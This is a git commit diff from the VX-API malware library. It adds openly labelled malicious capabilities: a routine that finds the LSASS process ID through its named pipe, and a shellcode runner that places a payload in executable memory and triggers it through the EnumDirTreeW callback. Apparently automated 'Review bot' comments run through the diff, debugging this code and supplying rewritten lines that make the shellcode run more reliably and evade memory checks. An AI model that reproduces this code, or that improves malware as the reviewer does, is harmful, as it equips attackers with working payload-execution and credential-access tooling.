new malcode + fixes

This commit is contained in:
vxunderground 2022-10-25 21:28:31 -05:00
parent 8138d0abe1
commit 24f69a35ba
12 changed files with 359 additions and 104 deletions


@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.252
Version: 2.0.266
Developer: smelly__vx
@ -131,6 +131,7 @@ You're free to use this in any manner you please. You do not need to use this en
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
| MpfGetLsaPidFromNamedPipe | modexp | Malicious Capability |
| ShellcodeExecViaCertEnumSystemStore | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaCDefFolderMenu_Create2 | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaCertEnumSystemStoreLocation | alfarom256 and aahmad097| Malicious Capability |
@ -139,6 +140,7 @@ You're free to use this in any manner you please. You do not need to use this en
| ShellcodeExecViaEnumDateFormatsW | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDesktopsW | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDesktopWindows | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDirTreeW | alfarom256 and aahmad097| Malicious Capability |
# Todo list


@ -19,6 +19,7 @@ typedef NTSTATUS(NTAPI* NTQUERYINFORMATIONFILE)(HANDLE, PIO_STATUS_BLOCK, PVOID,
typedef NTSTATUS(NTAPI* NTOPENFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG);
typedef BOOL(NTAPI* RTLDOSPATHNAMETONTPATHNAME_U)(PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U);
typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG);
typedef NTSTATUS(NTAPI* NTFSCONTROLFILE)(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
@ -95,4 +96,13 @@ typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYS
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
/*******************************************
DBGHELP IMPORT
*******************************************/
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);


@ -0,0 +1,194 @@
#include "Win32Helper.h"
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
WCHAR ProcessParameterTransformed[MAX_PATH * sizeof(WCHAR)] = { 0 };
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
goto EXIT_ROUTINE;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessParameterTransformed, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}
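Review bot: In GetPidFromPidBruteForcingExA the `== 0` sits inside the CharStringToWCharString call, so the third argument is the boolean result of `StringLengthA(ProcessNameWithExtension) == 0` (0 for any non-empty name) and the `if` tests the converter's return value instead; a successful conversion therefore jumps to EXIT_ROUTINE and the function returns 0 before the process list is ever queried. The intended line is presumably `if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension)) == 0)`, the same condition shape as the other failure checks. Both variants also `return 0` after TryLoadDllMultiMethodW has handed back hShlwapi when a GetProcAddressA lookup fails (and the W variant's first guard does the same when only ntdll is missing), so the reference that EXIT_ROUTINE releases with FreeLibrary is leaked on those paths; `goto EXIT_ROUTINE` reuses the existing cleanup since ProcessId is still 0. Note that 0 is returned both for "no process matched" and for every failure, so callers cannot tell the two apart; if StringCompareW is case-sensitive, names that differ only in case from the image name will also miss.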


@ -1,96 +0,0 @@
#include "Win32Helper.h"
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}


@ -31,6 +31,34 @@
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#define FSCTL_PIPE_ASSIGN_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_DISCONNECT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 1, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_LISTEN CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_PEEK CTL_CODE(FILE_DEVICE_NAMED_PIPE, 3, METHOD_BUFFERED, FILE_READ_DATA)
#define FSCTL_PIPE_QUERY_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 4, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 5, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define FSCTL_PIPE_WAIT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 6, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_IMPERSONATE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 7, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 8, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_QUERY_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 9, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 10, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 11, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 12, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 13, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 14, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_FLUSH CTL_CODE(FILE_DEVICE_NAMED_PIPE, 16, METHOD_BUFFERED, FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_READ CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2045, METHOD_BUFFERED, FILE_READ_DATA)
#define FSCTL_PIPE_INTERNAL_WRITE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2046, METHOD_BUFFERED, FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2047, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_READ_OVFLOW CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2048, METHOD_BUFFERED, FILE_READ_DATA)
// Flags for query event
#define FILE_PIPE_READ_DATA 0x00000000
#define FILE_PIPE_WRITE_SPACE 0x00000001
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
@ -1097,4 +1125,6 @@ typedef struct _RTL_RELATIVE_NAME_U{
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
ULONG NumberOfProcessIdsInList;
ULONG_PTR ProcessIdList[1];
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
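Review bot: The FSCTL_PIPE_* codes and the FILE_PIPE_* flags are defined unconditionally; the same names come from ntifs.h, so any translation unit that ends up including it alongside this header would get C4005 redefinition warnings (errors if an expansion ever differs). Wrapping the group in `#ifndef FSCTL_PIPE_GET_PIPE_ATTRIBUTE` … `#endif`, or guarding each define, avoids that; whether ntifs.h is reachable from here is not visible in the hunk. The PIO_APC_ROUTINE typedef at the end of the second hunk annotates two of its three parameters with `_In_`; `_In_ PVOID ApcContext` would make it consistent.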


@ -47,7 +47,9 @@ int main(VOID)
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
ShellcodeExecViaEnumDesktopsW(&Sei);
//ShellcodeExecViaEnumDirTreeW(&Sei);
dwError = MpfGetLsaPidFromNamedPipe();
return dwError;
}
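Review bot: `dwError = MpfGetLsaPidFromNamedPipe();` stores a process id in the variable main returns as its exit status, so a successful run exits with the LSA PID instead of 0; keep it in its own local, e.g. `DWORD LsaPid = MpfGetLsaPidFromNamedPipe();`, and check it against the 0 / -1 failure values the implementation in this commit returns before deciding dwError. The commented-out `//ShellcodeExecViaEnumDirTreeW(&Sei);` beside the live EnumDesktopsW call is dead code; either remove it or leave a comment saying this block is a manual smoke test that toggles between callbacks. main() starts before this hunk.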


@ -0,0 +1,47 @@
#include "Win32Helper.h"
DWORD MpfGetLsaPidFromNamedPipe(VOID)
{
UNICODE_STRING Pipe = { 0 };
NTOPENFILE NtOpenFile = NULL;
NTFSCONTROLFILE NtfsControlFile = NULL;
NTCLOSE NtClose = NULL;
HMODULE hModule = NULL;
IO_STATUS_BLOCK IoBlock = { 0 };
OBJECT_ATTRIBUTES Attributes = { 0 };
DWORD ProcessId = ERROR_SUCCESS;
HANDLE hHandle = INVALID_HANDLE_VALUE;
NTSTATUS Status = STATUS_SUCCESS;
LPSTR InputBuffer = (LPSTR)"ServerProcessId";
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
if (hModule == NULL)
return -1;
NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
if (!NtOpenFile || !NtfsControlFile || !NtClose)
return -1;
RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");
InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);
Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
EXIT_ROUTINE:
if (hHandle)
NtClose(hHandle);
return ProcessId;
}
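Review bot: hHandle is initialised to INVALID_HANDLE_VALUE but the cleanup tests `if (hHandle)`, so when NtOpenFile fails and presumably leaves the output handle untouched the routine calls NtClose on (HANDLE)-1; `HANDLE hHandle = NULL;` matches how the other new routines in this commit treat NT handles and makes the guard correct. The failure returns are also inconsistent: a missing ntdll export returns -1, while a failed NtOpenFile or NtFsControlFile falls through to `return ProcessId`, which is still ERROR_SUCCESS, so the caller sees 0 for "query failed" and cannot distinguish it from a real result; returning -1 on the two NT_SUCCESS checks as well keeps one sentinel. The `if (!NT_SUCCESS(Status)) goto EXIT_ROUTINE;` immediately before the label is a no-op and can go, and the ntdll module is obtained through TryLoadDllMultiMethodW and never released, unlike GetPidFromPidBruteForcingEx which uses GetModuleHandleEx2W for the same module.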


@ -0,0 +1,55 @@
#include "Win32Helper.h"
DWORD UnusedSubroutineDisposeableThreadEnumDirTreeW(LPVOID Param)
{
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
SYMINITIALIZEW SymInitialize = NULL;
SYMCLEANUP SymCleanup = NULL;
ENUMDIRTREEW EnumDirTree = NULL;
LPVOID BinAddress = NULL;
BOOL bFlag = FALSE;
HMODULE hModule = NULL;
WCHAR DisposeableBuffer[512] = { 0 };
hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
if (hModule == NULL)
goto EXIT_ROUTINE;
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
if (!SymInitialize || !SymCleanup || !EnumDirTree)
goto EXIT_ROUTINE;
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
goto EXIT_ROUTINE;
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
goto EXIT_ROUTINE;
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
SymCleanup(InlineGetCurrentProcess);
bFlag = TRUE;
EXIT_ROUTINE:
if (hModule)
FreeLibrary(hModule);
if (BinAddress)
VirtualFree(BinAddress, 0, MEM_RELEASE);
return (bFlag ? 0 : 0xffffffff);
}
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
{
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThreadEnumDirTreeW, Sei, INFINITE);
}
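Review bot: Once SymInitialize has succeeded, a VirtualAlloc failure at `BinAddress == NULL` jumps straight to EXIT_ROUTINE and SymCleanup is never called, and the EnumDirTree return value is discarded, so bFlag is TRUE even when nothing under `C:\Windows` matched `*.log` and the callback (the payload) never ran. Tracking whether SymInitialize succeeded and checking EnumDirTree's result (presumably FALSE when no file matched) fixes both; the rewritten lines are below. The root and pattern are hard-coded, so the payload is invoked once per matching file unless the shellcode returns TRUE from the callback, which deserves a comment at the call site. The payload also lives in a PAGE_EXECUTE_READWRITE region for its whole lifetime; allocating read-write, copying, then VirtualProtect to PAGE_EXECUTE_READ is the usual refinement.
```cpp
BOOL bSymInitialized = FALSE;
/* … unchanged: dbghelp load and export resolution … */
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
    goto EXIT_ROUTINE;
bSymInitialized = TRUE;
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
    goto EXIT_ROUTINE;
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
/* EnumDirTreeW reports FALSE when no file under the root matched, i.e. the callback never ran */
if (!EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL))
    goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (bSymInitialized)
    SymCleanup(InlineGetCurrentProcess);
/* … unchanged: FreeLibrary / VirtualFree / return … */
```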


@ -170,8 +170,8 @@
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingW.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp" />
<ClCompile Include="GetPidFromPidBruteForcing.cpp" />
<ClCompile Include="GetPidFromWindowsTerminalService.cpp" />
<ClCompile Include="GetPidFromWmiComInterface.cpp" />
<ClCompile Include="GetProcAddress.cpp" />
@ -209,6 +209,7 @@
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
@ -230,6 +231,7 @@
<ClCompile Include="ShellcodeExecViaEnumDateFormatsW.cpp" />
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp" />
<ClCompile Include="ShellcodeExecViaEnumDesktopWindows.cpp" />
